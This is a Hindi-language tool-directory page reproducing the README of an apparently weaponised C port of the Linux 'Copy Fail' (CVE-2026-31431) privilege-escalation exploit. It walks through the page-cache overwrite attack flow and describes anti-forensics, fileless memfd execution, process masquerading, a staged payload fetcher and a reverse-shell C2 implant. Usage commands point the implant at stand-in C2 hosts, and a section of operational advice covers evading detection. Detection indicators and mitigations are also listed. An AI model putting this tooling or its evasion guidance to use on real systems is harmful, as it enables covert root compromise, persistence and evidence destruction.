Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
COPY-FAIL — Copy Fail - CVE-2026-31431 - redteam और अधिकृत प्रवेश परीक्षण संचालन के लिए सुरक्षित C कार्यान्वयन। ⚠️ कानूनी नोटिस: यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान, अधिकृत प्रवेश परीक्षण और रक्षात्मक विश्लेषण के लिए है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। | Kitploit
उपकरण/GitLabGitLab/toxy4ny/copy-fail
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitLabtoxy4ny/copy-fail

COPY-FAIL

रिपॉजिटरी देखें
132 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Copy Fail - CVE-2026-31431 - redteam और अधिकृत प्रवेश परीक्षण संचालन के लिए सुरक्षित C कार्यान्वयन। ⚠️ कानूनी नोटिस: यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान, अधिकृत प्रवेश परीक्षण और रक्षात्मक विश्लेषण के लिए है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

वेबसाइट
साझा करें

कॉपी फेल -- CVE-2026-31431

रेडटीम और अधिकृत पैनेट्रेशन परीक्षण संचालन के लिए कठोर C कार्यान्वयन।

⚠️ कानूनी सूचना: यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान, अधिकृत पैनेट्रेशन परीक्षण और रक्षात्मक विश्लेषण के लिए है। उन सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टमों तक अनधिकृत पहुंच अवैध है।

🚀 प्राथमिक विकास GitLab पर स्थानांतरित हो गया है।
यह रिपॉजिटरी यहां सक्रिय रूप से बनाए रखा जाता है। समस्याओं और योगदान के लिए, कृपया GitLab का उपयोग करें।


विषयसूची

  • अवलोकन
  • मूल अनुसंधान
  • हमारे सुधार
  • आर्किटेक्चर
  • बिल्ड
  • उपयोग
  • मॉड्यूल
  • परिचालन सुरक्षा
  • पहचान और शमन
  • श्रेय
  • लाइसेंस

अवलोकन

यह प्रोजेक्ट CVE-2026-31431 ("कॉपी फेल") स्थानीय विशेषाधिकार वृद्धि शोषण का एक कठोर, उत्पादन-तैयार C पोर्ट है, जिसे मूलतः Theori और Xint द्वारा 29 अप्रैल 2026 को प्रकट किया गया था।

मूल प्रूफ-ऑफ-कॉन्सेप्ट Python में लिखा गया था और अनुसंधान प्रदर्शन के लिए डिज़ाइन किया गया था। यह कार्यान्वयन इसे निम्नलिखित विशेषताओं के साथ रेडटीम-ग्रेड टूलकिट में बदल देता है:

  • शून्य डिस्क आर्टिफैक्ट (मेम्फ़्ड-आधारित फाइललेस निष्पादन)
  • स्वचालित लक्ष्य खोज (MAC जागरूकता के साथ setuid बाइनरी गणना)
  • एंटी-फोरेंसिक्स (कैश हटाना, टाइमस्टैम्प पुनर्स्थापना, स्व-विनाश)
  • ऑपरेटर नियंत्रण (कॉन्फ़िगरेबल टाइमआउट के साथ सिग्नल-ट्रिगर्ड निष्पादन)
  • क्रॉस-प्लेटफ़ॉर्म स्थैतिक बिल्ड (musl/zig के माध्यम से x86_64, ARM64, RISC-V)

मूल अनुसंधान

CVE-2026-31431: कॉपी फेल

भेद्यता तंत्र

यह भेद्यता Linux कर्नेल के AF_ALG क्रिप्टो उपतंत्र में निहित है। authencesn AEAD टेम्पलेट डिक्रिप्शन के लिए एक इन-प्लेस ऑप्टिमाइज़ेशन लागू करता है: जब सिफरटेक्स्ट किसी फ़ाइल के पेज कैश से splice() के माध्यम से आपूर्ति की जाती है, तो कर्नेल उसी पेज को स्रोत और गंतव्य दोनों के रूप में पुन: उपयोग करता है।

हमले का प्रवाह:

  1. एक setuid बाइनरी (जैसे /usr/bin/su) को केवल-पढ़ने के लिए खोलें
  2. AF_ALG के माध्यम से एक authencesn(hmac(sha256),cbc(aes)) AEAD ऑपरेशन सेट करें
  3. लक्ष्य फ़ाइल के पेज कैश से splice() के माध्यम से सिफरटेक्स्ट की आपूर्ति करें
  4. (असफल) डिक्रिप्ट ऑपरेशन प्रमाणीकरण द्वारा अस्वीकार किए जाने से पहले पेज कैश पेज के 4 बाइट्स को अधिलेखित कर देता है
  5. पेलोड के प्रत्येक 4-बाइट विंडो के लिए दोहराएं
  6. लक्ष्य पर execve() निष्पादित करें -- कर्नेल कैश से उत्परिवर्तित पेज लोड करता है, setuid-root क्रेड्स प्रदान करता है
  7. पेलोड पूर्ण रूट शेल पर स्थानांतरित हो जाता है

मुख्य अंतर्दृष्टि: डिस्क पर मौजूद इनोड कभी संशोधित नहीं होता। केवल इन-मेमोरी पेज कैश उत्परिवर्तित होता है, जिससे पारंपरिक फ़ाइल अधिलेखन शोषणों की तुलना में फोरेंसिक पहचान काफी कठिन हो जाती है।


हमारे सुधार

यह प्रोजेक्ट नौ मॉड्यूलों में रेडटीम-उन्मुख सख्तीकरण के साथ मूल अनुसंधान का विस्तार करता है।

1. कठोर शोषण प्राइमिटिव (patch_chunk.c)

2. स्वचालित लक्ष्य खोज (target_discovery.c)

  • तीन-चरणीय स्कैनिंग: प्राथमिकता लक्ष्य → मानक निर्देशिकाएं → गहन स्कैन
  • MAC-जागरूक स्कोरिंग: AppArmor/SELinux प्रोफाइल वाले बाइनरी को दंडित करता है
  • 18 प्राथमिकता लक्ष्य: su, sudo, passwd, pkexec, mount, ping, आदि।
  • फ़ॉलबैक श्रृंखला: यदि प्राथमिक लक्ष्य विफल होता है, तो स्वचालित रूप से अगला सर्वश्रेष्ठ उम्मीदवार चुनता है
  • स्नैप जागरूकता: /snap (गैर-पारंपरिक setuid) को छोड़ता है

3. एंटी-फोरेंसिक्स सूट (anti_forensics.c)

4. फाइललेस निष्पादन (memfd_exec.c)

  • memfd_create + fexecve: फ़ाइल सिस्टम पथ के बिना निष्पादित करें
  • क्लोकिंग: memfd को kworker, anon_inode, eventfd नाम दिया गया (/proc/$pid/fd/ में घुलमिल जाता है)
  • फोर्क-एंड-फॉरगेट: डबल-फोर्क करके अनाथ प्रक्रिया बनाएं (PPID=1)
  • इन-मेमोरी डिक्रिप्शन: XOR और RC4 डिक्रिप्ट-देन-एक्जीक्यूट (पेलोड कभी डिस्क पर सादा टेक्स्ट नहीं)

5. स्टेज-1 पेलोड डिलीवरी (stage1.c)

6. स्टेज-2 C2 इम्प्लांट (stage2_template.c)

  • लचीला पुनर्संयोजन लूप एक्सपोनेंशियल बैकऑफ़ के साथ
  • तीन वितरण: यूनिफ़ॉर्म, त्रिकोणीय, एक्सपोनेंशियल जिटर
  • सिग्नल नियंत्रण: SIGUSR1 (ट्रिगर), SIGUSR2 (स्थिति), SIGTERM (शटडाउन)
  • DNS बीकनिंग: TCP कनेक्ट से पहले छिपी C2 स्वास्थ्य जांच
  • प्रक्रिया मास्करेड: ps/top में [kworker/N:0]

7. प्रक्रिया छिपाना (proc_hide.c)

  • argv[0] अधिलेखन: /proc/$pid/cmdline का इन-प्लेस प्रतिस्थापन
  • prctl(PR_SET_NAME): कर्नेल थ्रेड-शैली नाम (16-बाइट सीमा)
  • पर्यावरण स्वच्छीकरण: SSH_*, AWS_*, TOKEN*, आदि का चयनात्मक वाइप
  • माता-पिता से अलगाव: टर्मिनल स्वतंत्रता के लिए setsid() + setpgid()

8. सिग्नल ट्रिगर नियंत्रण (signal_trigger.c)

मोडव्यवहारउपयोग मामला
trigger_oneshot()

शून्य-सीपीयू प्रतीक्षा: पोलिंग लूप के बजाय sigsuspend()।

9. स्लीप जिटर (sleep_jitter.c)

  • तीन RNG बैकएंड: getrandom(2), /dev/urandom, rdtsc फ़ॉलबैक
  • अस्वीकृति नमूनाकरण: समान वितरण में मॉड्यूलो पूर्वाग्रह को समाप्त करता है
  • ड्रिफ्ट मुआवजा: sleep_scheduled() जिटर के बावजूद औसत अंतराल बनाए रखता है
  • सैंडबॉक्स पहचान: check_sandbox_acceleration() पैच किए गए sleep() का पता लगाता है

आर्किटेक्चर

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                     exploit.c (Orchestrator)                 │
│  ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐          │
│  │  Hide   │ │Discover │ │ Exploit │ │ Cleanup │          │
│  │ Process │ │ Target  │ │         │ │         │          │
│  └────┬────┘ └────┬────┘ └────┬────┘ └────┬────┘          │
│       │           │           │           │                │
│       ▼           ▼           ▼           ▼                │
│  ┌─────────────────────────────────────────────────────┐  │
│  │              Core Module Layer                        │  │
│  │  patch_chunk.c  target_discovery.c  anti_forensics.c  │  │
│  └─────────────────────────────────────────────────────┘  │
│       │           │           │           │                │
│       ▼           ▼           ▼           ▼                │
│  ┌─────────────────────────────────────────────────────┐  │
│  │              Delivery & Evasion Layer               │  │
│  │  stage1.c  memfd_exec.c  proc_hide.c                │  │
│  │  signal_trigger.c  sleep_jitter.c                   │  │
│  └─────────────────────────────────────────────────────┘  │
│       │           │           │           │                │
│       ▼           ▼           ▼           ▼                │
│  ┌─────────────────────────────────────────────────────┐  │
│  │              Payload Layer (Stage-2)                │  │
│  │  stage2_template.c  (reverse shell / C2 implant)    │  │
│  └─────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────┘

बिल्ड

आवश्यकताएँ

  • GCC या Clang
  • GNU Make
  • Linux हेडर (linux-libc-dev या समतुल्य)
  • वैकल्पिक: musl-tools (छोटे स्थैतिक बिल्ड के लिए)
  • वैकल्पिक: zig (आधुनिक क्रॉस-कम्पाइलेशन के लिए)
  • वैकल्पिक: dpkg-deb (Debian पैकेजिंग के लिए)

त्वरित आरंभ

root@kitploit:~
# मानक रेडटीम बिल्ड (ऑप्टिमाइज़्ड, स्ट्रिप्ड, स्थैतिक)
make redteam

# पेनटेस्ट बिल्ड (प्रतीक, मध्यम ऑप्टिमाइज़ेशन)
make pentest

# डीबग बिल्ड (ASAN, पूर्ण प्रतीक)
make debug

# भेद्यता जांचकर्ता (गैर-विनाशकारी)
make checker

क्रॉस-कम्पाइलेशन

root@kitploit:~
# ARM64 (AWS/Azure क्लाउड लक्ष्य)
make cross-arm64

# RISC-V
make cross-riscv

# ARM HF (एम्बेडेड/IoT)
make cross-armhf

# Zig क्रॉस-कम्पाइल (कोई टूलचेन स्थापना नहीं)
make cross-zig-arm64
make cross-zig-riscv

musl स्थैतिक बिल्ड (छोटे बाइनरी)

root@kitploit:~
make musl-static
# ~50-100 KB स्थैतिक बाइनरी उत्पन्न करता है जिसमें शून्य glibc निर्भरता होती है

Debian पैकेज

root@kitploit:~
make deb VERSION=1.0.0
# उत्पादन: build/deb/copy-fail-cve-2026-31431-1.0.0.deb

बिल्ड जानकारी

root@kitploit:~
make info
# दिखाता है: CC, CFLAGS, LDFLAGS, आर्किटेक्चर, टूलचेन उपलब्धता

उपयोग

मानक मोड (सिग्नल-ट्रिगर्ड)

root@kitploit:~
# इम्प्लांट तैनात करें
./exploit &
IMP_PID=$!

# दूरस्थ रूप से शोषण ट्रिगर करें
kill -USR1 $IMP_PID

# स्थिति का अनुरोध करें (कोई कार्रवाई नहीं)
kill -USR2 $IMP_PID

# सुचारू शटडाउन
kill -TERM $IMP_PID

तत्काल निष्पादन

root@kitploit:~
./exploit -t                    # अब ट्रिगर करें, कोई सिग्नल प्रतीक्षा नहीं
./exploit -t -c c2.example.com -p 9999

कस्टम कॉन्फ़िगरेशन

root@kitploit:~
./exploit \
  -c c2.redteam.internal \      # C2 होस्टनाम
  -p 4444 \                      # C2 पोर्ट
  -d 300 \                       # 5-मिनट प्रारंभिक देरी
  -T 7200 \                      # 2-घंटे ट्रिगर टाइमआउट
  -n                             # भेद्यता सत्यापन छोड़ें

गैर-विनाशकारी भेद्यता जांच

root@kitploit:~
./vulnerable
# निकास कोड: 100 = असुरक्षित, 0 = पैच किया गया, अन्य = त्रुटि

मॉड्यूल


परिचालन सुरक्षा

रेडटीम सर्वोत्तम अभ्यास

  1. कम-गतिविधि अवधि के दौरान तैनात करें सहसंबंध को कम करने के लिए
  2. पुनर्संयोजन अंतराल के लिए एक्सपोनेंशियल जिटर का उपयोग करें (बीकनिंग पहचान से बचता है)
  3. स्वचालित-ट्रिगर के बजाय SIGUSR1 के माध्यम से ट्रिगर करें (ऑपरेटर नियंत्रण बनाए रखता है)
  4. हमेशा सफाई चलाएं (full_cleanup) भले ही शोषण विफल हो
  5. डिस्क-आधारित पेलोड की तुलना में memfd निष्पादन को प्राथमिकता दें
  6. स्थायित्व के लिए डबल-फोर्क करें (memfd_fork_exec_detach)
  7. निष्पादित करने से पहले सैंडबॉक्स त्वरण की निगरानी करें

फोरेंसिक आर्टिफैक्ट


पहचान और शमन

रक्षात्मक पहचान

शमन

  1. कर्नेल पैच: कमिट a664bf3d603d के साथ Linux >= 6.14 पर अपग्रेड करें
  2. लाइवपैच: डिस्ट्रो-विशिष्ट बैकपोर्ट लागू करें
  3. SELinux/AppArmor: setuid बाइनरी पर प्रोफ़ाइल लागू करें
  4. eBPF निगरानी: AF_ALG + splice() संयोजनों को ट्रेस करें
  5. पेज कैश सत्यापन: महत्वपूर्ण बाइनरी पर आवधिक अखंडता जांच

श्रेय

मूल अनुसंधान

  • Theori -- Jinoh Kang, Yonghwi Jin, Seunghyun Lee
  • Xint -- सहयोगी प्रकटीकरण
  • विवरण: https://copy.fail/
  • मूल PoC: theori-io/copy-fail-CVE-2026-31431

आधार C पोर्ट

  • Tony Gies -- tgies/copy-fail-c
  • nolibc का उपयोग करके मूलभूत C कार्यान्वयन प्रदान किया
  • क्रॉस-प्लेटफ़ॉर्म सिस्कॉल रैपर और बिल्ड बुनियादी ढांचा

यह कठोर फोर्क

  • 9 मॉड्यूलों में रेडटीम-उन्मुख सख्तीकरण
  • परिचालन सुरक्षा सुविधाएं (एंटी-फोरेंसिक्स, चोरी, छिपाव)
  • क्रॉस-कम्पाइलेशन समर्थन (musl, zig, मल्टी-आर्क)
  • सिग्नल-आधारित ऑपरेटर नियंत्रण और कॉन्फ़िगरेबल निष्पादन मोड

आभार

  • memfd_create(2) और fexecve(3) के लिए Linux कर्नेल डेवलपर्स
  • हेडर-ओनली libc विकल्प के लिए nolibc अनुरक्षक
  • छोटे स्थैतिक बाइनरी के लिए musl libc प्रोजेक्ट
  • आधुनिक क्रॉस-कम्पाइलेशन टूलचेन के लिए Zig प्रोजेक्ट

लाइसेंस

यह प्रोजेक्ट डुअल-लाइसेंस के अंतर्गत है:

  • LGPL-2.1-or-later
  • MIT

SPDX पहचानकर्ताओं के लिए व्यक्तिगत स्रोत फ़ाइलें देखें।

मूल अनुसंधान और आधार C पोर्ट अपने संबंधित लाइसेंसों के अंतर्गत रहते हैं। इस फोर्क का अतिरिक्त कोड ओपन-सोर्स और वाणिज्यिक सुरक्षा अनुसंधान उपयोग मामलों दोनों के साथ अधिकतम संगतता के लिए उपरोक्त डुअल लाइसेंस के अंतर्गत प्रदान किया गया है।


अस्वीकरण

यह सॉफ्टवेयर केवल अधिकृत सुरक्षा अनुसंधान और अधिकृत पैनेट्रेशन परीक्षण के लिए प्रदान किया गया है। इस सॉफ्टवेयर के दुरुपयोग या क्षति के लिए लेखक कोई देयता नहीं मानते हैं। किसी भी ऐसे सिस्टम का परीक्षण करने से पहले जिसके आप स्वामी नहीं हैं, हमेशा उचित प्राधिकरण प्राप्त करें।

यदि आप अपने सिस्टम पर यह भेद्यता पाते हैं:

  • कर्नेल पैच लागू करें (कमिट a664bf3d603d या डिस्ट्रो बैकपोर्ट)
  • ऊपर सूचीबद्ध समझौता संकेतकों (IoCs) की निगरानी करें
  • AF_ALG विसंगतियों के लिए /var/log/audit/ और EDR टेलीमेट्री की समीक्षा करें
टूल डाउनलोड करें
गुणमान
प्रकटीकरण तिथि29 अप्रैल, 2026
शोधकर्ताTheori (Jinoh Kang, Yonghwi Jin, Seunghyun Lee), Xint
विवरणhttps://copy.fail/
मूल PoCtheori-io/copy-fail-CVE-2026-31431 (Python)
C पोर्ट (आधार)tgies/copy-fail-c by Tony Gies
प्रभावित कर्नेलLinux 4.14 -- 6.14 (सुधार कमिट a664bf3d603d से पहले)
गंभीरताCVSS 7.8 (उच्च) -- स्थानीय विशेषाधिकार वृद्धि
विशेषतामूलहमारा कार्यान्वयन
सॉकेट प्रबंधनप्रति खंड नया सॉकेटसॉकेट पुन: उपयोग (~60% कम सिस्कॉल)
सत्यापनकोई नहींmmap + memcmp स्वचालित पुनर्प्रयास (3 प्रयास) के साथ
समानांतर लेखनकेवल अनुक्रमिकफोर्क-आधारित समानांतर (16 प्रोसेस तक)
त्रुटि कोडबाइनरी सफलता/विफलतासूक्ष्म: 0=सत्यापित, 1=पैच किया हुआ कर्नेल, -1=घातक
हीप आवंटनहॉट पथ में mallocकेवल स्टैक (कोई आवंटन जिटर नहीं)
तकनीकउद्देश्य
posix_fadvise(POSIX_FADV_DONTNEED)प्रति-फ़ाइल पेज कैश निष्कासन
echo 3 > /proc/sys/vm/drop_cachesवैश्विक कैश ड्रॉप (पोस्ट-रूट)
utimensat() टाइमस्टॉम्पमूल atime/mtime पुनर्स्थापित करें
स्व-विनाशनिष्पादन से पहले ड्रॉपर बाइनरी को शून्य से अधिलेखित करें
मेमोरी वाइपसंवेदनशील बफ़र्स का volatile शून्यीकरण
चैनलछिपावगतिफ़ॉलबैक प्राथमिकता
एम्बेडेडअधिकतमतत्कालअंतिम (एयरगैप)
HTTP डायरेक्टमध्यम<1sपहला
सिस्टम curl/wgetकम1-3sदूसरा (HTTPS समर्थन)
DNS TXTउच्चधीमातीसरा (फ़ायरवॉल बायपास)
सोएं → ट्रिगर → निष्पादित करें → बाहर निकलें
हिट-एंड-रन
trigger_daemon()सोएं → ट्रिगर → निष्पादित करें → लूपस्थायी इम्प्लांट
trigger_auto()टाइमआउट फ़ॉलबैक के साथ सोएंअनअटेंडेड ऑप्स
मॉड्यूलफ़ाइल(ें)उद्देश्य
शोषण प्राइमिटिवpatch_chunk.c/hAF_ALG/splice पेज कैश उत्परिवर्तन
लक्ष्य खोजtarget_discovery.c/hsetuid बाइनरी स्वचालित रूप से स्कैन और स्कोर करें
एंटी-फोरेंसिक्सanti_forensics.c/hसफाई, टाइमस्टॉम्प, स्व-विनाश
स्टेज-1 डिलीवरीstage1.c/hफाइललेस पेलोड लाना और निष्पादित करना
स्टेज-2 C2stage2_template.c/hपुनर्संयोजन लूप के साथ रिवर्स शेल
memfd निष्पादनmemfd_exec.c/hअनाम फ़ाइल निष्पादन प्राइमिटिव
प्रक्रिया छिपानाproc_hide.c/hargv/cmdline/comm मास्करेडिंग
सिग्नल नियंत्रणsignal_trigger.c/hऑपरेटर-ट्रिगर्ड निष्पादन
स्लीप जिटरsleep_jitter.c/hवितरण के साथ यादृच्छिक देरी
ऑर्केस्ट्रेटरexploit.cमुख्य प्रवेश बिंदु और समन्वय
जांचकर्ताvulnerable.cगैर-विनाशकारी भेद्यता जांच
आर्टिफैक्टस्थानशमन
उत्परिवर्तित पेज कैशकेवल RAMdrop_page_cache_for_file()
बाइनरी पथ/proc/$pid/exememfd ((deleted) के रूप में दिखता है)
कमांड लाइन/proc/$pid/cmdlineoverwrite_argv()
प्रक्रिया नाम/proc/$pid/commprctl(PR_SET_NAME)
टाइमस्टैम्पलक्ष्य पर stat()timestomp_file()
ड्रॉपर बाइनरीडिस्क परself_destruct_and_exec()
नेटवर्क कनेक्शनnetstat, EDRDNS बीकनिंग, जिटर
संकेतकपहचान विधि
AF_ALG सॉकेट + splice() पैटर्नeBPF सिस्कॉल ट्रेसिंग
संदिग्ध नामों के साथ memfd_create/proc/$pid/fd/ निगरानी
यूज़रस्पेस में ब्रैकेटेड प्रक्रिया नामप्रक्रिया विसंगति पहचान
एकल डोमेन के लिए नियमित DNS क्वेरीDNS विश्लेषण
पेज कैश अखंडता बेमेलकर्नेल मेमोरी फोरेंसिक्स